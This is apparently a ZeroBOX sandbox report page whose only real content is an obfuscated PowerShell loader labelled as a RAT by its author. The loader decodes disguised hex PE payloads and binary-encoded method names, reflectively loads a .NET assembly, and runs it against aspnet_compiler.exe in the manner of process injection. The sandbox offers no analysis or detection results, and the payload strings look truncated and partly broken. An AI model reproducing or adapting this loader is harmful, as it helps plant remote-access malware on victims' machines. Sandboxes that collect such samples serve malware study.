Static | ZeroBOX
No static analysis available.
#mY cODER 3LOSH RAT ::::::
Function HzGaJsAt([String] $Ediiit) {
$EdiiitS = [System.Collections.Generic.List[Byte]]::new()
for ($i = 0; $i -lt $Ediiit.Length; $i +=8) {
$EdiiitS.Add([Convert]::ToByte($Ediiit.Substring($i, 8), 2))
return [System.Text.Encoding]::ASCII.GetString($EdiiitS.ToArray())
function DEHZ {
param($Alosh)
$Alosh = $Alosh -split '(..)' | ? { $_ }
ForEach ($JSEYHESSS325 in $Alosh){
[Convert]::ToInt32($JSEYHESSS325,16)
$Ediiit = '4D5@9%%%%3%%%%%%%4%%%%%%FFFF%%%%B8%%%%%%%%%%%%%%4%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%8%%%%%%%%E!FB@%E%%B4%9CD2!B8%!4CCD2!546869732%7%726F67726!6D2%636!6E6E6F742%62652%72756E2%696E2%444F532%6D6F64652E%D%D%@24%%%%%%%%%%%%%%5%45%%%%4C%!%3%%766@7@64%%%%%%%%%%%%%%%%E%%%%2%!%B%!%8%%%%FC%%%%%%%@%%%%%%%%%%%%7E!@%!%%%%2%%%%%%%2%%!%%%%%%4%%%%%2%%%%%%%%2%%%%%4%%%%%%%%%%%%%%%4%%%%%%%%%%%%%%%%6%%!%%%%%2%%%%%%%%%%%%%2%%6%85%%%%!%%%%%!%%%%%%%%%!%%%%%!%%%%%%%%%%%%%!%%%%%%%%%%%%%%%%%%%%%%%3%!@%!%%4B%%%%%%%%2%%!%%FF%7%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%4%%!%%%C%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%2%%%%%%8%%%%%%%%%%%%%%%%%%%%%%%82%%%%%48%%%%%%%%%%%%%%%%%%%%%%2E74657874%%%%%%84F@%%%%%%2%%%%%%%FC%%%%%%%2%%%%%%%%%%%%%%%%%%%%%%%%%%%%2%%%%%6%2E72737263%%%%%%FF%7%%%%%%2%%!%%%%%8%%%%%%FE%%%%%%%%%%%%%%%%%%%%%%%%%%%%4%%%%%4%2E72656C6F63%%%%%C%%%%%%%%4%%!%%%%%2%%%%%%%6%!%%%%%%%%%%%%%%%%%%%%%%%%%%4%%%%%42%%%%%%%%%%%%%%%%%%%%%
$geGWHZ = '4D5@9%%%%3%%%%%%%4%%%%%%FFFF%%%%B8%%%%%%%%%%%%%%4%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%8%%%%%%%%E!FB@%E%%B4%9CD2!B8%!4CCD2!546869732%7%726F67726!6D2%636!6E6E6F742%62652%72756E2%696E2%444F532%6D6F64652E%D%D%@24%%%%%%%%%%%%%%5%45%%%%4C%!%3%%BF@%%365%%%%%%%%%%%%%%%%E%%%%2%!%B%!%8%%%%F8%%%%%%%@%%%%%%%%%%%%9E!6%!%%%%2%%%%%%%2%%!%%%%%%4%%%%%2%%%%%%%%2%%%%%4%%%%%%%%%%%%%%%4%%%%%%%%%%%%%%%%6%%!%%%%%2%%%%%%%%%%%%%2%%6%85%%%%!%%%%%!%%%%%%%%%!%%%%%!%%%%%%%%%%%%%!%%%%%%%%%%%%%%%%%%%%%%%44!6%!%%57%%%%%%%%2%%!%%FF%7%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%4%%!%%%C%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%2%%%%%%8%%%%%%%%%%%%%%%%%%%%%%%82%%%%%48%%%%%%%%%%%%%%%%%%%%%%2E74657874%%%%%%@4F6%%%%%%2%%%%%%%F8%%%%%%%2%%%%%%%%%%%%%%%%%%%%%%%%%%%%2%%%%%6%2E72737263%%%%%%FF%7%%%%%%2%%!%%%%%8%%%%%%F@%%%%%%%%%%%%%%%%%%%%%%%%%%%%4%%%%%4%2E72656C6F63%%%%%C%%%%%%%%4%%!%%%%%2%%%%%%%2%!%%%%%%%%%%%%%%%%%%%%%%%%%%4%%%%%42%%%%%%%%%%%%%%%%%%%%%
[Byte[]]$UUSW23 = DEHZ $Ediiit
[Byte[]]$JESTW3ERH2 = DEHZ $geGWHZ
$SJEWS4 = HzGaJsAt("-X-X-X-XXX-1-X-X-X-XXX--X-X-X-XXX--X-X-X-XXX-1-X-X-X-XXX-1-X-X-X-XXX-1111-X-X-X-XXX--X-X-X-XXX--X-X-X-XXX--X-X-X-XXX-11-X-X-X-XXX--X-X-X-XXX-1-X-X-X-XXX-1-X-X-X-XXX-11-X-X-X-XXX--X-X-X-XXX--X-X-X-XXX-11-X-X-X-XXX-111-X-X-X-XXX-1-X-X-X-XXX-1-X-X-X-XXX-111-X-X-X-XXX-1-X-X-X-XXX--X-X-X-XXX--X-X-X-XXX-11-X-X-X-XXX--X-X-X-XXX-1-X-X-X-XXX-1".Replace('-X-X-X-XXX-','0'))
$JDRU32 = HzGaJsAt("0-X-X-X-XXX-00-X-X-X-XXX-00-X-X-X-XXX-0-X-X-X-XXX--X-X-X-XXX-0-X-X-X-XXX--X-X-X-XXX--X-X-X-XXX-00-X-X-X-XXX--X-X-X-XXX--X-X-X-XXX-0-X-X-X-XXX--X-X-X-XXX-00-X-X-X-XXX--X-X-X-XXX-0-X-X-X-XXX--X-X-X-XXX--X-X-X-XXX--X-X-X-XXX-0-X-X-X-XXX--X-X-X-XXX-0-X-X-X-XXX-0-X-X-X-XXX--X-X-X-XXX-0-X-X-X-XXX--X-X-X-XXX-00-X-X-X-XXX-0-X-X-X-XXX-".Replace('-X-X-X-XXX-','1'))
$CompilerPath = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe'
#
$Assembly = [System.Reflection.Assembly]::Load($JESTW3ERH2)
#
$Type = $Assembly.GetType('NewPE2.PE')
$Method = $Type.GetMethod($SJEWS4)
#
$Arguments = [object[]]($CompilerPath, $UUSW23)
$Method.$JDRU32.Invoke($null, $Arguments)
} catch {
#
No antivirus signatures available.
No IRMA results available.